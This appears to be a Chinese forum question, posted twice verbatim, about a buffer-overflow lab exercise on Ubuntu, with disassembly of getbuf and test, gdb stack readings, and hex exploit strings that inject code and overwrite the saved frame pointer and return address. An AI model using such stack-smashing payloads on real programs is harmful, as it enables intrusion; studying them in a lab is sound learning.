关于缓冲区攻击溢出问题,ubuntu
2011-11-04 00:29
080484c0 <getbuf>:
80484c0: 55 push %ebp
80484c1: 89 e5 mov %esp,%ebp
80484c3: 8d 45 e8 lea -0x18(%ebp),%eax
80484c6: 83 ec 28 sub $0x28,%esp
80484c9: 89 04 24 mov %eax,(%esp)
80484cc: e8 5f ff ff ff call 8048430 <getxs>
80484d1: 89 ec mov %ebp,%esp
80484d3: b8 01 00 00 00 mov $0x1,%eax
80484d8: 5d pop %ebp
80484d9: c3 ret
80484da: 8d b6 00 00 00 00 lea 0x0(%esi),%esi
080484e0 <test>:
80484e0: 55 push %ebp
80484e1: 89 e5 mov %esp,%ebp
80484e3: 83 ec 08 sub $0x8,%esp
80484e6: c7 04 24 04 86 04 08 movl $0x8048604,(%esp)
80484ed: e8 76 fe ff ff call 8048368 <printf@plt>
80484f2: e8 c9 ff ff ff call 80484c0 <getbuf>
80484f7: 89 44 24 04 mov %eax,0x4(%esp)
80484fb: c7 04 24 15 86 04 08 movl $0x8048615,(%esp)
8048502: e8 61 fe ff ff call 8048368 <printf@plt>
8048507: 89 ec mov %ebp,%esp
8048509: 5d pop %ebp
804850a: c3 ret
804850b: 90 nop
804850c: 8d 74 26 00 lea 0x0(%esi,%eiz,1),%esi
gdb为:
(gdb) x/w $ebp
0xbfffefe8: 0xbfffeff8
(gdb) x/w ($ebp+4)
0xbfffefec: 0x080484f7
(gdb) x/w ($ebp-4)
0xbfffefe4: 0x0028bff4
(gdb) x/w ($ebp-0x18)
0xbfffefd0: 0xbfffeff8
(gdb) x/w ($ebp-24)
0xbfffefd0: 0xbfffeff8
所以输入数据应该为:
b8 ef be ad de 68 f7 84 04 08 c3 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 ef ff bf d0 ef ff bf
改为下面这样也是不行啊
b8 ef be ad de 68 f7 84 04 08 c3 00 00 00 00 00 00 00 00 00 f4 bf 28 00 f8 ef ff bf d0 ef ff bf
攻击代码地址为:d0 ef ff bf
是因为这句 <getbuf>
80484c3: 8d 45 e8 lea -0x18(%ebp),%eax
她分配了24个字节空间,所以攻击代码地址有下面的命令得到,
(gdb) x/w ($ebp-24)
0xbfffefd0: 0xbfffeff8
由于为buf分配了24个字节的空间,所以在我的输入后面补了好多的00,一直补到24个字节,这段代码好象没有gs验证码问题(从汇编代码中可以看到)
我也是在ubuntu下工作的,用的gcc版本为3.*
2011-11-04 00:29
080484c0 <getbuf>:
80484c0: 55 push %ebp
80484c1: 89 e5 mov %esp,%ebp
80484c3: 8d 45 e8 lea -0x18(%ebp),%eax
80484c6: 83 ec 28 sub $0x28,%esp
80484c9: 89 04 24 mov %eax,(%esp)
80484cc: e8 5f ff ff ff call 8048430 <getxs>
80484d1: 89 ec mov %ebp,%esp
80484d3: b8 01 00 00 00 mov $0x1,%eax
80484d8: 5d pop %ebp
80484d9: c3 ret
80484da: 8d b6 00 00 00 00 lea 0x0(%esi),%esi
080484e0 <test>:
80484e0: 55 push %ebp
80484e1: 89 e5 mov %esp,%ebp
80484e3: 83 ec 08 sub $0x8,%esp
80484e6: c7 04 24 04 86 04 08 movl $0x8048604,(%esp)
80484ed: e8 76 fe ff ff call 8048368 <printf@plt>
80484f2: e8 c9 ff ff ff call 80484c0 <getbuf>
80484f7: 89 44 24 04 mov %eax,0x4(%esp)
80484fb: c7 04 24 15 86 04 08 movl $0x8048615,(%esp)
8048502: e8 61 fe ff ff call 8048368 <printf@plt>
8048507: 89 ec mov %ebp,%esp
8048509: 5d pop %ebp
804850a: c3 ret
804850b: 90 nop
804850c: 8d 74 26 00 lea 0x0(%esi,%eiz,1),%esi
gdb为:
(gdb) x/w $ebp
0xbfffefe8: 0xbfffeff8
(gdb) x/w ($ebp+4)
0xbfffefec: 0x080484f7
(gdb) x/w ($ebp-4)
0xbfffefe4: 0x0028bff4
(gdb) x/w ($ebp-0x18)
0xbfffefd0: 0xbfffeff8
(gdb) x/w ($ebp-24)
0xbfffefd0: 0xbfffeff8
所以输入数据应该为:
b8 ef be ad de 68 f7 84 04 08 c3 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 ef ff bf d0 ef ff bf
改为下面这样也是不行啊
b8 ef be ad de 68 f7 84 04 08 c3 00 00 00 00 00 00 00 00 00 f4 bf 28 00 f8 ef ff bf d0 ef ff bf
攻击代码地址为:d0 ef ff bf
是因为这句 <getbuf>
80484c3: 8d 45 e8 lea -0x18(%ebp),%eax
她分配了24个字节空间,所以攻击代码地址有下面的命令得到,
(gdb) x/w ($ebp-24)
0xbfffefd0: 0xbfffeff8
由于为buf分配了24个字节的空间,所以在我的输入后面补了好多的00,一直补到24个字节,这段代码好象没有gs验证码问题(从汇编代码中可以看到)
我也是在ubuntu下工作的,用的gcc版本为3.*